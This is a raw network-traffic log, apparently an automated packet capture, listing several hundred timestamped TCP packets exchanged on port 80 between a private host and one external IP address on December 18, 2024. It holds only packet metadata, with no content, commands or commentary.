                                                                    Dec 18, 2024 09:13:21.435445070 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.435545921 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.435570955 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.438069105 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.438142061 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.438178062 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.440664053 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.440784931 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.440913916 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.443305969 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.443440914 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.443797112 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.445980072 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.446083069 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.446120977 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.448570967 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.448635101 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.448668003 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.451206923 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.451262951 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.451351881 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.453844070 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.453908920 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.454025030 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.800885916 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.800971031 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.801646948 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.801759958 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.801816940 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.802495003 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.802519083 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.802578926 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.803354979 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.803472042 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.803531885 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.804233074 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.804367065 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.804421902 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.805119038 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.805242062 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.805309057 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.805993080 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.806101084 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.806154013 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.806845903 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.806982040 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.807570934 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.807693005 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.807804108 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.807905912 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.808542967 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.808634043 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.808865070 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.809427977 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.809556007 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.809616089 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.810296059 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.810410023 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.810467005 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.811217070 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.811412096 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.811472893 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.812077045 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.812141895 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.812247038 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.812907934 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.813107014 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.813163996 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.813817024 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.813896894 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.813955069 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.814682961 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.814707041 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.814763069 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.815509081 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.815665960 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.815721035 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.816365957 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.816485882 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.816540956 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.817225933 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.817357063 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.817420006 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.818100929 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.818206072 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.818336010 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.819031000 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.819116116 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.819175005 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.819850922 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.819962025 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.820020914 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.820689917 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.820766926 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.820828915 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.821619034 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.821743011 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.821800947 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.822457075 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.822561026 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.822802067 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.823296070 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.823508978 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.823576927 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.824191093 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.824351072 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.824479103 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.825040102 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.825164080 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.825222015 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.825911999 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.826039076 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.826112986 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.826793909 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.826919079 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.826992035 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.827650070 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.827851057 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.827908993 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.828511000 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.828614950 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.828674078 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.829377890 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.829513073 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.829653025 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.830252886 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.830322981 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.830535889 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.831123114 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.831373930 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.831439018 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.832027912 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.832145929 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.832204103 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.832855940 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.832880974 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.832940102 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.833759069 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.833782911 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.833841085 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.834626913 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.834717989 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.834779024 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.835474968 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.835552931 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.835695982 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.836328030 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.836424112 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.836479902 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.837183952 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.837249041 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.837311983 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.838123083 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.838262081 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.838416100 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.838943005 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.839046955 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.839107990 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.839762926 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.947637081 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.985574007 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.985635042 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.985882998 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.985915899 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.986006975 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.986090899 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.986771107 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.986879110 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.987018108 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.987610102 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.987663031 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.987725973 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.988476992 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.988646030 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.988833904 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.989365101 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.989471912 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.989518881 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.990216017 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.990317106 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.990376949 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.991081953 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.991184950 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.991602898 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.991955042 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.992090940 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.992181063 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.992822886 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.992947102 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.993166924 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.993686914 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.993792057 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.993943930 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.994545937 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.994652987 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.994703054 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.995472908 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.995572090 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.995754957 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.996329069 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.996397018 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.996447086 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.997241974 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.997347116 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.997406960 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.998023033 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.998182058 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.998697042 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.998877048 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.999197006 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.999243975 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.999749899 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.999855995 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.000273943 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.000611067 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.000679016 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.000782013 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.001533985 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.001728058 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.001780987 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.002475977 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.002556086 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.003012896 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.003211021 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.003334045 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.003379107 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.004091024 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.004154921 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.004219055 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.004966021 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.372281075 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.372332096 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.373008966 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.373117924 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.373171091 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.373922110 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.374030113 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.374078989 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.374747038 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.374988079 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.375603914 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.375722885 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.375787973 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.376477957 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.376534939 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.376584053 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.377386093 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.377907038 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.377952099 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.378222942 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.378333092 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.378372908 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.379154921 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.379338026 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.379951000 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.380001068 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.380055904 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.380201101 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.380819082 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.380897045 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.381680965 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.381805897 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.381861925 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.382554054 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.382671118 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.383464098 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.383527994 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.383553028 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.384295940 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.384345055 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.384396076 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.385140896 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.385185003 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.385310888 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.386184931 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.386229038 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.386286020 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.386565924 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.386897087 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.387006998 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.387052059 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.387768030 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.387911081 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.387959957 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.388605118 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.388725042 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.388771057 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.389482975 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.389607906 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.389651060 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.390348911 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.390505075 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.390549898 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.391295910 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.391408920 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.392086029 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.392148972 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.392296076 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.392962933 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.393019915 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.393220901 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.393810987 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.393871069 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.393939018 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.394088984 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.394702911 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.394819021 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.395562887 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.395690918 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.395749092 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.396425962 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.396542072 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.396591902 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.397293091 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.397442102 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.397499084 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.398149967 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.398266077 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.398313999 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.399009943 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.399115086 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.399885893 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.399935961 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.399991035 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.400765896 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.400813103 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.400855064 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.401624918 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.401675940 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.401720047 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.402488947 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.402540922 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.402582884 CET8049729139.99.188.124192.168.2.5
